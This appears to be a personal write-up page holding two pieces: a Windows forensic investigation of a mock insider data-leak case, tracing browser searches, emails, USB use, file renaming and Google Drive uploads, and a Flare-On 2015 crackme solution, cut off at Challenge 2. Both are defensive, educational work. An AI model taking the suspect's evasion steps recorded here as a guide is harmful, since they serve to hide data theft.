svcKBFWLink	http://go.microsoft.com/fwlink/?LinkId=524482	Microsoft update/help reference URL
svcVersion	11.0.9600.17691	IE/Windows service version
svcUpdateVersion	11.0.17	Update branch/version of service component
svcKBNumber	KB3032359	Installed KB patch identifier

Identify browser history paths.

MS IE (9 or lower) :
- C:\Users\informant\AppData\Local\Microsoft\Windows\History\
- C:\Users\informant\AppData\Local\Microsoft\Windows\Temporary Internet Files\
- C:\Users\informant\AppData\Roaming\Microsoft\Windows\Cookies\
MS IE 11 :
- C:\Users\informant\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat
Chrome :
- C:\Users\informant\AppData\Local\Google\Chrome\User Data\Default\History
- C:\Users\informant\AppData\Local\Google\Chrome\User Data\Default\Application Cache\
- C:\Users\informant\AppData\Local\Google\Chrome\User Data\Default\Media Cache\
- C:\Users\informant\AppData\Local\Google\Chrome\User Data\Default\GPUCache\
- C:\Users\informant\AppData\Local\Google\Chrome\User Data\Default\Cookies\
- C:\Users\informant\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
- C:\Users\informant\AppData\Local\Google\Chrome\User Data\Default\Extensions\
Considerations
- History, Cache, Cookie… -
  - Windows Search database ([[Digital Forensics Investigation Questions#Windows Search Analysis]])
  - C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb

What websites were accessed? (Timestamp, URL)

To analyze Internet Explorer History,
C:\Users\informant\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat file, we need some kind of parser IE10Analyzer.

For Chrome Browser History,
- C:\Users\informant\AppData\Local\Google\Chrome\User Data\Default\History
- This website is useful to parse SQLite Database file, https://inloop.github.io/sqlite-viewer/.

Software Download / Installation

Timestamp	Activity	Link	Browser
2015-03-22 11:10:50	IE download page	http://windows.microsoft.com/en-us/internet-explorer/download-ie	IE 8
2015-03-22 11:11:04	IE11 installer download	http://download.microsoft.com/download/7/1/7/7179A150-F2D2-4502-9D70-4B59EA148EAA/IE11-Windows6.1-x64-en-us.exe	IE 8
2015-03-22 11:11:06	Chrome installer download	https://dl.google.com/update2/1.3.26.9/GoogleInstaller_en.application	IE 8
2015-03-23 15:56:15	Google Drive download	https://www.google.com/drive/download/	Chrome
2015-03-23 15:55:28	iCloud setup page	https://www.apple.com/icloud/setup/pc.html	Chrome

Data Leakage / Suspicious Research

Timestamp	Activity	Link
2015-03-23 14:02:09	Search: data leakage methods	https://www.google.com/search?q=data+leakage+methods
2015-03-23 14:02:18	Read SANS paper	http://www.sans.org/reading-room/whitepapers/awareness/data-leakage-threats-mitigation_1931
2015-03-23 14:02:44	Search: leaking confidential info	https://www.google.com/search?q=leaking+confidential+information
2015-03-23 14:03:40	Search: leakage cases	https://www.google.com/search?q=information+leakage+cases
2015-03-23 14:05:55	FBI IP theft page	http://www.fbi.gov/about-us/investigate/white_collar/ipr/ipr
2015-03-23 14:06:27	Search: how to leak a secret ⚠️	https://www.google.com/search?q=how+to+leak+a+secret
2015-03-23 14:06:53	Research paper (leak secret)	http://research.microsoft.com/en-us/um/people/yael/publications/2001-leak_secret.pdf

Forensics Awareness

Timestamp	Activity	Link
2015-03-23 14:10:03	Search: email forensic investigation	http://www.bing.com/search?q=Forensic+Email+Investigation
2015-03-23 14:10:27	Search: Windows artifacts	http://www.bing.com/search?q=what+is+windows+system+artifacts
2015-03-23 14:11:12	Read forensic article	http://resources.infosecinstitute.com/windows-systems-and-artifacts-in-digital-forensics-part-i-registry/
2015-03-23 14:12:35	Search: event logs	http://www.bing.com/search?q=windows+event+logs
2015-03-23 14:12:52	Event Viewer info	http://en.wikipedia.org/wiki/Event_Viewer
2015-03-23 14:14:24	USB forensic artifact	http://www.forensicswiki.org/wiki/USB_History_Viewing

Data Exfiltration Methods

Timestamp	Activity	Link
2015-03-23 14:07:58	Search: file sharing	http://www.bing.com/news/search?q=file+sharing+and+tethering
2015-03-23 14:08:18	File sharing article	http://sysinfotools.com/blog/tethering-internet-files-sharing/
2015-03-23 14:13:20	Search: CD burning	http://www.bing.com/search?q=cd+burning+method
2015-03-23 14:14:11	Search: external devices	http://www.bing.com/search?q=external+device+and+forensics
2015-03-23 14:15:09	Search: cloud storage	https://www.google.com/search?q=cloud+storage
2015-03-23 14:15:32	Compare cloud tools	http://www.pcadvisor.co.uk/test-centre/internet/3506734/best-cloud-storage-dropbox-google-drive-onedrive-icloud/

Anti-Forensics (CRITICAL EVIDENCE)

Timestamp	Activity	Link
2015-03-23 14:17:14	Search: anti-forensics	https://www.google.com/search?q=antiforensics
2015-03-23 14:17:19	Anti-forensic techniques	http://forensicswiki.org/wiki/Anti-forensic_techniques
2015-03-23 14:18:00	DEFCON anti-forensics paper	https://defcon.org/images/defcon-20/dc-20-presentations/Perklin/DEFCON20-Perklin-AntiForensics.pdf
2015-03-23 14:16:55	Search: delete data	https://www.google.com/search?q=how+to+delete+data
2015-03-23 14:19:03	Search: data recovery tools	https://www.google.com/search?q=data+recovery+tools

Evidence Destruction Tools

Timestamp	Activity	Link
2015-03-25 10:46:44	Search: anti-forensic tools	http://www.bing.com/search?q=antiforensic+tools
2015-03-25 10:46:59	Eraser official site	http://eraser.heidi.ie/
2015-03-25 10:47:34	Download Eraser	http://iweb.dl.sourceforge.net/project/eraser/Eraser%206/6.2/Eraser%206.2.0.2962.exe
2015-03-25 10:47:51	Search: CCleaner	http://www.bing.com/search?q=ccleaner
2015-03-25 10:48:12	Download CCleaner	http://www.piriform.com/ccleaner/download

List browser search keywords.

User Search Activity (Cleaned & Relevant)

Timestamp	Search Query	URL	Browser
2015-03-23 14:02:09	data leakage methods	https://www.google.com/webhp?hl=en#hl=en&q=data+leakage+methods	Chrome
2015-03-23 14:02:44	leaking confidential information	https://www.google.com/webhp?hl=en#hl=en&q=leaking+confidential+information	Chrome
2015-03-23 14:03:40	information leakage cases	https://www.google.com/webhp?hl=en#hl=en&q=information+leakage+cases	Chrome
2015-03-23 14:05:48	intellectual property theft	https://www.google.com/search?q=intellectual+property+theft	Chrome
2015-03-23 14:06:27	how to leak a secret ⚠️	https://www.google.com/search?q=how+to+leak+a+secret	Chrome
2015-03-23 14:07:58	file sharing and tethering	http://www.bing.com/news/search?q=file+sharing+and+tethering	IE 11
2015-03-23 14:08:31	DLP DRM	http://www.bing.com/search?q=DLP+DRM	IE 11
2015-03-23 14:08:54	email investigation	http://www.bing.com/search?q=email+investigation	IE 11
2015-03-23 14:10:03	forensic email investigation	http://www.bing.com/search?q=Forensic+Email+Investigation	IE 11
2015-03-23 14:10:27	windows system artifacts	http://www.bing.com/search?q=what+is+windows+system+artifacts	IE 11
2015-03-23 14:11:50	investigation on windows machine	http://www.bing.com/search?q=investigation+on+windows+machine	IE 11
2015-03-23 14:12:35	windows event logs	http://www.bing.com/search?q=windows+event+logs	IE 11
2015-03-23 14:13:20	CD burning method	http://www.bing.com/search?q=cd+burning+method	IE 11
2015-03-23 14:13:37	CD burning in Windows	http://www.bing.com/search?q=cd+burning+method+in+windows	IE 11
2015-03-23 14:14:11	external device forensics	http://www.bing.com/search?q=external+device+and+forensics	IE 11
2015-03-23 14:14:50	cloud storage	https://www.google.com/search?q=cloud+storage	Chrome
2015-03-23 14:15:44	digital forensics	https://www.google.com/search?q=digital+forensics	Chrome
2015-03-23 14:16:55	how to delete data ⚠️	https://www.google.com/search?q=how+to+delete+data	Chrome
2015-03-23 14:17:14	anti-forensics ⚠️	https://www.google.com/search?q=anti-forensics	Chrome
2015-03-23 14:18:10	system cleaner ⚠️	https://www.google.com/search?q=system+cleaner	Chrome
2015-03-23 14:18:30	how to recover data	https://www.google.com/search?q=how+to+recover+data	Chrome
2015-03-23 14:19:03	data recovery tools	https://www.google.com/search?q=data+recovery+tools	Chrome
2015-03-23 15:55:09	Apple iCloud	https://www.google.com/webhp?hl=en#hl=en&q=apple+icloud	Chrome
2015-03-23 15:56:04	Google Drive	https://www.google.com/webhp?hl=en#hl=en&q=google+drive	Chrome
2015-03-24 17:06:50	security checkpoint CD-R	https://www.google.com/#q=security+checkpoint+cd-r	Chrome
2015-03-25 10:46:44	anti-forensic tools ⚠️	http://www.bing.com/search?q=antiforensic+tools	IE 11
2015-03-25 10:46:54	eraser (secure delete tool) ⚠️	http://www.bing.com/search?q=eraser	IE 11
2015-03-25 10:47:51	CCleaner ⚠️	http://www.bing.com/search?q=ccleaner	IE 11

List all user keywords at the search bar in Windows Explorer. (Timestamp, Keyword)

HKU\informant\Software\Microsoft\Windows\CurrentVersion\Explorer\WordWheelQuery\

secret, 2015-03-23 18:40:17

Email Investigation

HKLM\SOFTWARE\Classes\mailto\shell\open\command (Microsoft Outlook)
HKLM\SOFTWARE\Clients\Mail (Microsoft Outlook)
HKU\informant\Software\Microsoft\Office\15.0\Outlook

What application was used for e-mail communication?

Value Name	Data	Forensic Relevance
(default)	Microsoft Outlook	Confirms Outlook is installed/configured
SupportUTF8	1	UTF-8 support enabled (modern email handling)
DLLPathEx	C:\PROGRA~1\MICROS~2\Office15\OLMAPI32.DLL	Points to Outlook MAPI library (execution dependency)
DLLPath	mapi32.dll	Core MAPI DLL used by Outlook
MSIComponentID	{6DB1921F-8B40-4406-A18B-E906DBEEF0C9}	Unique Office installation component ID
MSIOfficeLCID	Office language resources path	Indicates installed Office language settings
MSIApplicationLCID	Outlook UI language settings	Tracks Outlook language usage
MSIInstallOnWTS	0	Not installed on Terminal Services

Where is the e-mail file located and List all e-mails (including deleted). What was the e-mail account used?

File is located at,
C:\Users\informant\AppData\Local\Microsoft\Outlook\iaman.informant@nist.gov.ost

To read this email pff-tools this utility can be used,

sudo apt install pff-tools
pffexport iaman.informant@nist.gov.ost

I found 4 deleted messages under,
- iaman.informant@nist.gov.ost.expor/Root - Mailbox/IPM_SUBTREE/
- /Sent Items/
  - Message00001
    - ConversationIndex.txt
    - InternetHeaders.txt
    - Message.html
    - OutlookHeaders.txt
    - Recipients.txt
  - Message00002
    - ...
- /Inbox/
  - Message00001
    - ConversationIndex.txt
    - InternetHeaders.txt
    - Message.html
    - OutlookHeaders.txt
    - Recipients.txt
  - Message00002
    - ...
  - Message00003
    - ...
  - Message00004
    - …
  - Message00005
    - ...
- /Deleted Items/
  - Message00001
    - ConversationIndex.txt
    - InternetHeaders.txt
    - Message.html
    - OutlookHeaders.txt
    - Recipients.txt
  - Message00002
    - ...
  - Message00003
    - ...
  - Message00004
    - ...

Sent Items

Message00001

Message00002

Inbox messages

Message00001

Message00002

Message00003

Message00004

Message00005

Deleted Messages

Message00001

https://drive.google.com/file/d/0Bz0ye6gXtiZaVl8yVU5mWHlGbWc/view?usp=sharing
https://drive.google.com/file/d/0Bz0ye6gXtiZaVl8yVU5mWHlGbWc/view?usp=sharing

Message00002

Message00003

I am trying.

-----Original Message-----
From: spy 
Sent: Tuesday, March 24, 2015 3:33 PM
To: iaman
Subject: Watch out!

USB device may be easily detected. 

So, try another method.

Message00004

spy.conspirator@nist.gov <-> iaman.informant@nist.gov

Timestamp	Source	From → To	Subject	Key Content / Insight
2015-03-23 13:29:27	Inbox	spy.conspirator@nist.gov → iaman.informant@nist.gov	Hello, Iaman	Initial contact (“How are you doing?”)
2015-03-23 14:44:31	Sent	iaman.informant@nist.gov → spy.conspirator@nist.gov	RE: Hello, Iaman	“Successfully secured” → ⚠️ Task acknowledgment
2015-03-23 15:14:58	Inbox	spy → iaman	Good job, buddy	Requests more detailed data
2015-03-23 15:20:41	Inbox	spy ↔ iaman	RE: Good job, buddy	iaman agrees to continue (“I’ll be in touch”)
2015-03-23 15:26:22	Inbox	spy → iaman	Important request	Confirms operation, asks for more data
2015-03-23 15:27:05	Sent	iaman → spy	RE: Important request	Needs time → possible hesitation
2015-03-23 16:38:47	Recovered (OST slack)	iaman → spy	It's me	⚠️ Google Drive links shared (data exfiltration)
2015-03-23 16:41:19	Deleted	spy ↔ iaman	RE: It's me	“I got it” → confirms receipt of data
2015-03-24 09:25:57	Inbox	spy → iaman	Last request	Requests remaining data
2015-03-24 09:35:10	Deleted	iaman ↔ spy	RE: Last request	iaman: “hard to transfer all data over internet”
2015-03-24 09:34:00 (approx)	Thread	spy → iaman	RE: Last request	⚠️ Suggests physical transfer (storage devices)
2015-03-24 15:34:02	Deleted	iaman ↔ spy	Watch out!	⚠️ Avoid USB → suggests detection awareness
2015-03-24 17:05:09	Deleted	iaman → spy	Done	⚠️ Final confirmation (“It’s done”)

External Devices & File Activity

HKLM\SYSTEM\MountedDevices\
HKLM\SYSTEM\ControlSet###\Enum\USBSTOR\ -HKLM\SYSTEM\ControlSet###\Control\DeviceClasses\{a5dcbf10-6530-11d2-901f-00c04fb951ed}\
HKLM\SYSTEM\ControlSet###\Control\DeviceClasses\{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\
HKU\informant\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\
HKLM\SOFTWARE\Microsoft\Windows Search\VolumeInfoCach

List external storage devices.

Timestamp	Device Type	Device Name	Serial Number	Forensic Relevance
2015-03-24 13:37:59	USB	VID_0781&PID_5571 (SanDisk Cruzer Fit)	4C530012450531101593	USB inserted (first device)
2015-03-24 13:38:00	USBSTOR	Disk&Ven_SanDisk&Prod_Cruzer_Fit	4C530012450531101593	Mass storage mounted
2015-03-24 13:58:32	USB	VID_0781&PID_5571 (SanDisk Cruzer Fit)	4C530012550531106501	Second USB device inserted
2015-03-24 13:58:33	USBSTOR	Disk&Ven_SanDisk&Prod_Cruzer_Fit	4C530012550531106501	Second storage mounted
2015-03-24 13:58:34	Volume	Mounted Volume	{A2F2048C-D228-11E4-B630-000C29FF2429}	Volume created (data access)
2015-03-25 13:05:36	USB	VID_0E0F&PID_0003 (VMware Virtual USB)	6&b77da92&0&1	Virtual device (lab artifact, ignore operationally)

Device Name	Serial Number	First Seen (System)	First Connected	Last Connected	Notes
SanDisk Cruzer Fit USB Device	4C530012450531101593	2015-03-23 14:31:10	2015-03-24 09:38:00	2015-03-24 13:38:00	First USB used, short session
SanDisk Cruzer Fit USB Device	4C530012550531106501	2015-03-24 09:58:32	2015-03-24 09:58:32	2015-03-24 13:58:33	Second USB, likely main exfil device

Identify file renaming traces (Desktop, date range).

(It should be considered only during a date range between 2015-03-23 and 2015-03-24.) [Hint: the parent directories of renamed files were deleted and their MFT entries were also overwritten. Therefore, you may not be able to find their full paths.]
NTFS journal file analysis (UsnJrnl) - \$Extend\$UsnJrnl·$J (+ $MFT for identifying full paths of files)
With NTFS journal file only, it may be hard to find full paths.
We can consider the Registry ShellBags for further information.
I carved both UsnJournal and Master File Table files from \$Extend,

Converting $MFT and $J to CSV

It can be parse using MFTECmd.exe,
By corelating it, we found the names.

MFTECmd.exe -f "$MFT" --csv MFT
MFTECmd.exe -f "$J" --csv J

Timestamp	USN (Old → New)	Original File (Sensitive)	Renamed To (Cover File)
2015-03-23 14:41:40	56306184 → 56306328	[secret_project]_detailed_proposal.docx	landscape.png
2015-03-23 14:41:55	56307712 → 56307848	[secret_project]_design_concept.ppt	space_and_earth.mp4
2015-03-23 16:30:44	58506640 → 58506776	(secret_project)_pricing_decision.xlsx	happy_holiday.jpg
2015-03-23 16:31:02	58510288 → 58510424	[secret_project]_final_meeting.pptx	do_u_wanna_build_a_snow_man.mp3
2015-03-24 09:49:51	59801680 → 59801816	[secret_project]_detailed_design.pptx	winter_weather_advisory.zip
2015-03-24 09:50:08	59802408 → 59802544	[secret_project]_revised_points.ppt	winter_storm.amr
2015-03-24 09:50:49	59803456 → 59803592	[secret_project]_design_concept.ppt	space_and_earth.mp4
2015-03-24 09:52:35	59814352 → 59814488	[secret_project]_final_meeting.pptx	do_u_wanna_build_a_snow_man.mp3
2015-03-24 09:52:56	59814904 → 59815040	(secret_project)_market_analysis.xlsx	new_years_day.jpg
2015-03-24 09:53:08	59815232 → 59815360	(secret_project)_market_shares.xls	super_bowl.avi
2015-03-24 09:53:38	59815536 → 59815680	(secret_project)_price_analysis_#1.xlsx	my_favorite_movies.7z
2015-03-24 09:53:52	59815968 → 59816104	(secret_project)_price_analysis_#2.xls	my_favorite_cars.db
2015-03-24 09:54:05	59816312 → 59816448	(secret_project)_pricing_decision.xlsx	happy_holiday.jpg
2015-03-24 09:54:23	59816880 → 59817008	[secret_project]_progress_#1.docx	my_smartphone.png
2015-03-24 09:54:43	59817984 → 59818112	[secret_project]_progress_#2.docx	new_year_calendar.one
2015-03-24 09:54:52	59818320 → 59818448	[secret_project]_progress_#3.doc	my_friends.svg
2015-03-24 09:55:08	59818624 → 59818768	[secre\t_project]_detailed_proposal.docx	a_gift_from_you.gif
2015-03-24 09:55:17	59818976 → 59819096	[secret_project]_proposal.docx	landscape.png
2015-03-24 09:55:32	59819272 → 59819416	[secret_project]_technical_review_#1.docx	diary_#1d.txt
2015-03-24 09:55:42	59819592 → 59819736	[secret_project]_technical_review_#1.pptx	diary_#1p.txt
2015-03-24 09:55:53	59819912 → 59820056	[secret_project]_technical_review_#2.docx	diary_#2d.txt
2015-03-24 09:56:09	59823280 → 59823424	[secret_project]_technical_review_#2.ppt	diary_#2p.txt
2015-03-24 09:56:14	59823600 → 59823744	[secret_project]_technical_review_#3.doc	diary_#3d.txt
2015-03-24 09:56:20	59823920 → 59824064	[secret_project]_technical_review_#3.ppt	diary_#3p.txt

Network Drive Analysis

HKU\informant\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\
HKU\informant\Software\Microsoft\Windows\CurrentVersion\Explorer\Map Network Drive MRU\
HKU\informant\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\8\0\

IP address of company shared network drive?

\\10.11.11.128\secured_drive	: 2015-03-23 20:23:28

Directories traversed in RM#2.

Timestamp may not be accurate.
E:\ can be inferred from external storage devices attached to PC in Question 22.
You can consider a created timestamp and a last accessed timestamp of each ShellBag entry.
HKU\informant\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\1~
We can open the UsrClass.dat into ShellBags Explorer.

Timestamp	Directory Path	Source
2015-03-24 10:00:19	E:\Secret Project Data	Created
2015-03-24 10:01:11	E:\Secret Project Data\technical	Created
2015-03-24 10:01:14	E:\Secret Project Data\proposal	Created
2015-03-24 10:01:15	E:\Secret Project Data\progress	Created
2015-03-24 10:01:17	E:\Secret Project Data\pricing decision	Created
2015-03-24 10:01:29	E:\Secret Project Data\design	Last Accessed
2015-03-24 16:54:07	E:\Secret Project Data	Last Accessed
2015-03-24 16:54:07	E:\Secret Project Data\progress	Last Accessed

List all files that were opened in RM#2.

Timestamp	Path	Action	Source
2015-03-24 10:01:23	E:\Secret Project Data\design\winter_whether_advisory.zip	Accessed	JumpList
2015-03-24 10:01:29	E:\Secret Project Data\design\winter_whether_advisory.zip\ppt	Accessed	JumpList
2015-03-24 10:01:29	E:\Secret Project Data\design	Created	ShellBag

Directories in company network drive.

'Timestamp' may not be accurate.
V:\ is mapped on \\10.11.11.128
HKU\informant\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\8\0\~
\User\informant\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations
\User\informant\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations
\User\informant\AppData\Roaming\Microsoft\Windows\Recent\*.lnk
\User\informant\AppData\Roaming\Microsoft\Office\Recent\*.lnk

Timestamp	Path	Action	Source
2015-03-23 16:24:01	\10.11.11.128\secured_drive\Common Data	Created	ShellBag
2015-03-23 16:24:08	\10.11.11.128\secured_drive\Past Projects	Created	ShellBag
2015-03-23 16:24:12	\10.11.11.128\secured_drive\Secret Project Data\design	Created	ShellBag
2015-03-23 16:24:15	\10.11.11.128\secured_drive\Secret Project Data\pricing decision	Created	ShellBag
2015-03-23 16:24:16	\10.11.11.128\secured_drive\Secret Project Data\final	Created	ShellBag
2015-03-23 16:24:18	\10.11.11.128\secured_drive\Secret Project Data\technical review	Created	ShellBag
2015-03-23 16:24:20	\10.11.11.128\secured_drive\Secret Project Data\proposal	Created	ShellBag
2015-03-23 16:24:27	\10.11.11.128\secured_drive\Secret Project Data\progress	Created	ShellBag
2015-03-23 16:26:53	\10.11.11.128\secured_drive\Secret Project Data\pricing decision	Accessed	JumpList
2015-03-23 16:26:54	\10.11.11.128\secured_drive\Secret Project Data\pricing decision\	Accessed	LNK File
2015-03-23 16:27:24	V:\Secret Project Data	Created	ShellBag
2015-03-23 16:27:29	V:\Secret Project Data\final	Created	ShellBag
2015-03-23 16:27:33	V:\Secret Project Data\final\	Accessed	JumpList
2015-03-23 16:27:33	V:\Secret Project Data\final\	Accessed	LNK File
2015-03-23 16:28:17	\10.11.11.128\secured_drive\Secret Project Data	Last Accessed	ShellBag
2015-03-23 16:28:17	\10.11.11.128\secured_drive\Secret Project Data\pricing decision	Last Accessed	ShellBag
2015-03-24 09:47:54	\10.11.11.128\secured_drive	Last Accessed	ShellBag
2015-03-24 09:47:54	\10.11.11.128\secured_drive\Past Projects	Last Accessed	ShellBag

Files opened in company network drive.

Timestamp	File Path	Action	Source
2015-03-23 16:26:53	\10.11.11.128\SECURED_DRIVE\Secret Project Data\pricing decision(secret_project)_pricing_decision.xlsx	Accessed	JumpList
2015-03-23 16:26:53	\10.11.11.128\SECURED_DRIVE\Secret Project Data\pricing decision(secret_project)_pricing_decision.xlsx	Accessed	LNK (Windows)
2015-03-23 16:26:53	\10.11.11.128\SECURED_DRIVE\Secret Project Data\pricing decision(secret_project)_pricing_decision.xlsx	Accessed	LNK (Office)
2015-03-23 16:26:56	\10.11.11.128\secured_drive\Secret Project Data\pricing decision(secret_project)_pricing_decision.xlsx	Accessed	Registry (Office)
2015-03-23 16:27:33	V:\Secret Project Data\final[secret_project]_final_meeting.pptx	Accessed	JumpList
2015-03-23 16:27:33	V:\Secret Project Data\final[secret_project]_final_meeting.pptx	Accessed	LNK (Windows)
2015-03-23 16:27:37	V:\Secret Project Data\final[secret_project]_final_meeting.pptx	Accessed	LNK (Office)
2015-03-23 16:27:37	V:\Secret Project Data\final[secret_project]_final_meeting.pptx	Accessed	Registry (Office)

Cloud Forensics

Find traces related to cloud services on PC. (Service name, log files...)

Installation directory
Registry (Configuration, Uninstall Information, Autoruns, UserAssist, Classes…)

Service	Artifact Type	Location / Path	Details
Google Drive	File/Dir	C:\Program Files (x86)\Google\Drive\|Installation directory
Google Drive	File/Dir	C:\Users\informant\AppData\Google\Drive\user_default\|User config directory
Google Drive	File	C:\Users\informant\AppData\Google\Drive\user_default\sync_config.db	Deleted
Google Drive	File	C:\Users\informant\AppData\Google\Drive\user_default\snapshot.db	Deleted
Google Drive	File	C:\Users\informant\AppData\Google\Drive\user_default\sync_log.log	Log file
Google Drive	File	C:\Users\informant\Downloads\googledrivesync.exe	Installer
Google Drive	Registry	HKU\informant\Software\Google\Drive	Configuration
Google Drive	Registry	HKU\informant\Software\Classes\GoogleDrive.*	File associations
Apple iCloud	File	C:\Users\informant\Downloads\icloudsetup.exe	Installer

Deleted files from Google Drive.

Path of google drive logs,
- \User\informant\AppData\Google\Drive\user_default\sync_log.log
We carve it and parse it using this tool, https://toolbox.googleapps.com/apps/loggershark/.

2015-03-23 16:32:35.072 -0400 INFO pid=2576 4004:LocalWatcher common.change_buffer:1017

Adding event to change buffer: RawEvent(  
  CREATE, path=u'\\\\?\\C:\\Users\\informant\\Google Drive\\happy_holiday.jpg', time=1427142755.056, is_dir=False,  
  ino=4503599627374809L, size=440517L, mtime=1422563714.5256062, parent_ino=844424930207017L,  
  is_cancelled=<RawEventIsCancelledFlag.FALSE: 0>, backup=<Backup.NO_BACKUP_CONTENT: (False, False)>)

It indicates that C:\\Users\\informant\\Google Drive\\happy_holiday.jpg this file is uploaded to drive.
Another one,

File Metadata (Recovered / Observed Files)

Timestamp	File Name	Original Modified Time
2015-03-23 16:42:17	happy_holiday.jpg	2015-01-30 11:49:20
2015-03-23 16:42:17	do_u_wanna_build_a_snow_man.mp3	2015-01-29 15:35:14

Google Drive Sync Activity (LocalWatcher Events)

Timestamp	File Path	Action	Size
2015-03-23 16:32:35	C:\Users\informant\Google Drive\happy_holiday.jpg	Created	440,517 B
2015-03-23 16:32:35	C:\Users\informant\Google Drive\do_u_wanna_build_a_snow_man.mp3	Created	6,844,294 B
2015-03-23 16:42:17	C:\Users\informant\Google Drive\happy_holiday.jpg	Deleted	—
2015-03-23 16:42:17	C:\Users\informant\Google Drive\do_u_wanna_build_a_snow_man.mp3	Deleted	—

Google Drive account information.

Logon Time	Account
2015-03-23 16:05:32	`iaman.informant.personal@gmail.com`

Flare-On 2015 March 2026

Wed, 25 Mar 2026 00:00:00 GMT

Category: Malware Analysis and Reverse Engineering
Difficulty: Easy/Medium/Hard
File: 2015_FLAREOn_Challenges.zip

Challenge 1:

Stage 1 Extracting CAB File

Initial Triage

File Type: PE32+ executable for MS Windows 5.02 (GUI), x86-64
Size: 183KB
SHA256: a0b3e6ab4a53bf745319177035017f222634d2601ba8708292d5fbe440467387

Basic Static Analysis

Detect it Easy (Die) show that this file is self-extracted CAB/SFX style packing, where the executable includes a compressed Microsoft Cabinet file (CAB) and extracts/executes it at runtime and it is just a wrapper/loader.
The .rsrc section is compressed, which is why the tool flags high entropy, classic sign of packing or encryption.
Compression algorithm used inside the CAB is LZX (as shown), which is common in Microsoft CAB archives.
So we have to first extract the actual exe from this and analyze it,

We can extract it using cabextract tool, and it will written in Flare-On_start_2015.exe file,

┌──(b14cky㉿DESKTOP-VRSQRAJ)-[~/]
└─$ cabextract Flare-On_start_2015.exe
Extracting cabinet: Flare-On_start_2015.exe
  extracting i_am_happy_you_are_to_playing_the_flareon_challenge.exe

All done, no errors.

Stage 2 Understanding the ASMx86 Compiled EXE

Initial Triage

File Type: PE32 executable for MS Windows 4.00 (console), Intel i386
Size: 2KB
SHA256: 5d35789ac904bc5f4639119391ad1078f267a157ca153f2906f05df94e557e11

Basic Static Analysis

It gives i_am_happy_you_are_to_playing_the_flareon_challenge.exe.
By running die on it, and it is written in assembly, not C/CPP.
Also, it has missing DOS Header which means most of the automatic tools fail here because of these setup.

Running floss for strings analysis,

┌──(b14cky㉿DESKTOP-VRSQRAJ)-[~/]
└─$ /opt/floss i_am_happy_you_are_to_playing_the_flareon_challenge.exe
.
.
.
 ───────────────────────────
  FLOSS STATIC STRINGS (18)
 ───────────────────────────

+----------------------------------+
| FLOSS STATIC STRINGS: ASCII (18) |
+----------------------------------+

.text
.data
Pj*h
Pj2hX!@
h.!@
kernel32.dll
LoadLibraryA
GetProcAddress
GetLastError
GetStdHandle
AttachConsole
WriteConsoleA
WriteFile
ReadFile
Let's start out easy
Enter the password>
You are success
You are failure

+------------------------------------+
| FLOSS STATIC STRINGS: UTF-16LE (0) |
+------------------------------------+
 ─────────────────────────
  FLOSS STACK STRINGS (0)
 ─────────────────────────
 ─────────────────────────
  FLOSS TIGHT STRINGS (0)
 ─────────────────────────
 ───────────────────────────
  FLOSS DECODED STRINGS (0)
 ───────────────────────────

These are the the kernel32.dll APIs,
It can be used for Dynamic API Resolution + I/O Execution Flow. (Just a hypothesis)

LoadLibraryA
GetProcAddress
GetLastError
GetStdHandle
AttachConsole
WriteConsoleA
WriteFile
ReadFile

Something related to password/licence checking,

Let's start out easy
Enter the password>
You are success
You are failure

Now, to confirm the imports i used pestudio and indeed it is using those,

Advance Static Analysis

So, to analyze it opened it in IDA with manual load because sometimes auto load fails in these kind of binaries, and found that it has only one start function is which is doing something,

GetStdHandle() is called with: - STD_INPUT_HANDLE → stdin - STD_OUTPUT_HANDLE → stdout
- Return values (in EAX) are saved as handles for input/output.
I/O Operations
- WriteFile() → prints prompt to console (stdout)
- ReadFile() → reads up to 50 bytes into input_buffer (0x402158)

BOOL start()
{
  int v0; // ecx
  HANDLE StdHandle; // [esp+4h] [ebp-Ch]
  HANDLE hFile; // [esp+8h] [ebp-8h]
  DWORD NumberOfBytesWritten; // [esp+Ch] [ebp-4h] BYREF

  StdHandle = GetStdHandle(STD_INPUT_HANDLE);
  hFile = GetStdHandle(STD_OUTPUT_HANDLE);
  WriteFile(
    hFile,
    aLetSStartOutEa,                            // "Let's start out easy\r\nEnter the password>"
    0x2Au,
    &NumberOfBytesWritten,
    nullptr);
  ReadFile(StdHandle, lpBuffer, 0x32u, &NumberOfBytesWritten, nullptr);
  v0 = 0;
  while ( ((unsigned __int8)lpBuffer[v0] ^ 0x7D) == byte_402140[v0] )
  {
    if ( ++v0 >= 24 )
      return WriteFile(
               hFile,
               aYouAreSuccess,                  // "You are success\r\n"
               0x12u,
               &NumberOfBytesWritten,
               nullptr);
  }
  return WriteFile(
           hFile,
           aYouAreFailure,                      // "You are failure\r\n"
           0x12u,
           &NumberOfBytesWritten,
           nullptr);
}

Expected C code,

for (i = 0; i < 24; i++) {
    if ((input[i] ^ 0x7D) != encoded[i]) {
        print("failure");
        return;
    }
}
print("success");

Here is the flow of code,
1. Print prompt
2. Read input
3. For each character:
  - XOR with 0x7D
  - Compare with stored value
4. If all 24 match → success
5. Else → failure
This are the sequence of bytes which are being XORed with key 0x7D.

1F 8 13 13 4 22 0E 11 4D 0D 18 3D 1B 11 1C 0F 18 50 12 13 53 1E 12 10

Got the flag!!

bunny_sl0pe@flare-on.com

You can also apply this IDApython script which will manually patch the bytes, (only for IDA pro).

import idc

for i in range(0x00402140, 0x00402158):
    b = 0x7D ^ idc.get_wide_byte(i)
    idc.patch_byte(i, b)

Challenge 2:

Stage 1 Understanding the ASMx86 Compiled exe

Initial Triage

File Type: PE32 executable for MS Windows 4.00 (console)
Size: 2KB
SHA256: 9852afb172bc03a50d291c70faa724c69a10af9e6ee88457185ce5e0705216f0

Basic Static Analysis

By running die on it, and it is written in assembly.
Also, it has missing DOS Header which means most of the automatic tools fail
I ran floss for strings analysis and here is what i get,

┌──(b14cky㉿DESKTOP-VRSQRAJ)-[~/]
